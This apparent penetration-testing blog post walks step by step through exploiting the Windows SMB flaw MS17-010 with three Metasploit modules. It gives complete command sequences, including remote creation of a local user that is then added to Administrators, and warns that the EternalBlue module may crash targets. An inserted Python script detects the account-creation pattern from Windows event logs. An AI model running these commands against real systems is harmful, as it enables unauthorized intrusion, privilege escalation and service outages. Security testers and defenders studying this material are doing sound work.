A Guide to Exploiting MS17-010 With Metasploit - 2020 Edition

One of the articles that I have written that got the most traction was the one regarding exploiting MS17-010 with Metasploit back in 2017. Well, things have changed, tools have changed, and methods have changed. Because of that, consider this the 2020 edition of that post.

Metasploit ships three modules that are commonly used to exploit this vulnerability. I have listed them in order from most reliable to least reliable.

  1. use exploit/windows/smb/ms17_010_psexec with credentials

  2. use auxiliary/admin/smb/ms17_010_command

  3. use exploit/windows/smb/ms17_010_eternalblue

I’ll go into detail using each of the above as examples.

ms17_010_psexec with credentials

This module is by far the most reliable; however, you do need valid credentials for the machine. Some use cases for it are the following:

  1. You have regular domain user credentials on the network and want to get admin on a machine.

  2. You have local user credentials for the machine and want to get admin.

  3. You want to validate that the vulnerability exists using a stable exploit.

Steps for using this exploit:

msfconsole // fires up metasploit

use exploit/windows/smb/ms17_010_psexec // loads the metasploit module

set smbuser jsmith // sets the username when authenticating to the machine

set smbpass Password1 // sets the password for the user

set smbdomain CORP // sets the domain to use. If this is a local account, use WORKGROUP or WORKSTATION as this value.

set RHOST <IP ADDRESS> // this sets the IP address of the target machine. Replace <IP ADDRESS> with the IP address of the target system.

run // this executes the command

The above exploit will work in almost all scenarios where the machine is vulnerable. This is the most reliable way to exploit MS17-010 on a machine.

ms17_010_command

This is the module I use in most cases, when I don’t have any credentials but have found a machine to be vulnerable. The commands to get this to work are the following:

use auxiliary/admin/smb/ms17_010_command // loads the metasploit module

set CMD net user james Password1 /add // adds the local user of “james” to the machine

set RHOST <IP ADDRESS> // this sets the IP address of the target machine. Replace <IP ADDRESS> with the IP address of the target system.

run // this executes the command

Once this runs successfully, we need to run the module again with a new CMD to make the local user we just created (james) a local administrator. This is done with the following command:

set CMD net localgroup administrators james /add

Once this is done, we can use psexec, crackmapexec, RDP, etc. to gain access to the machine!
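From the defender’s side, the two commands above leave a distinctive trace in the Windows Security log: a 4720 (account created) followed shortly by a 4732 (member added to a local group) for the same account. The following is an added detection example, not code from the original post; the event records are constructed, and the 4732 member name is assumed to have already been resolved from its SID.

```python
"""Flag a local account that is created and then added to Administrators
within a short window (the ms17_010_command pattern described above)."""
from datetime import datetime, timedelta

EVENT_USER_CREATED = 4720          # A user account was created
EVENT_ADDED_TO_LOCAL_GROUP = 4732  # A member was added to a security-enabled local group

# Constructed sample Security-log records for hypothetical hosts WS01 and WS02.
# "target" on a 4732 is assumed to be the member name resolved from the SID.
SAMPLE_EVENTS = [
    {"time": "2020-03-10T14:02:11", "id": 4720, "host": "WS01", "target": "james"},
    {"time": "2020-03-10T14:02:40", "id": 4732, "host": "WS01", "target": "james",
     "group": "Administrators"},
    {"time": "2020-03-10T09:15:00", "id": 4720, "host": "WS02", "target": "svc_backup"},
    {"time": "2020-03-11T16:40:00", "id": 4732, "host": "WS02", "target": "svc_backup",
     "group": "Administrators"},
]


def find_create_then_admin(events, window=timedelta(minutes=10)):
    """Return (host, user) pairs where an account was created and then added to
    the local Administrators group on the same host within `window`."""
    created = {}   # (host, user) -> creation time
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        key = (ev["host"], ev["target"].lower())
        if ev["id"] == EVENT_USER_CREATED:
            created[key] = t
        elif (ev["id"] == EVENT_ADDED_TO_LOCAL_GROUP
              and ev.get("group", "").lower() == "administrators"
              and key in created
              and t - created[key] <= window):
            hits.append(key)
    return hits


if __name__ == "__main__":
    for host, user in find_create_then_admin(SAMPLE_EVENTS):
        print(f"ALERT: new local account '{user}' made Administrator on {host}")
```

The svc_backup account on WS02 is not flagged because its group change came a day after creation; tune `window` to what is normal for your environment.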

ms17_010_eternalblue

This is the ugly stepchild of the MS17-010 exploits. It is very flaky, with a high risk of crashing the SMB service on the machine. Alas, if you’re feeling lucky, this is what you need to do:

use exploit/windows/smb/ms17_010_eternalblue // loads the Metasploit module

set RHOST <IP ADDRESS> // this sets the IP address of the target machine. Replace <IP ADDRESS> with the IP address of the target system.

run // this executes the command

Chances are if you did not get a shell, you crashed the machine.
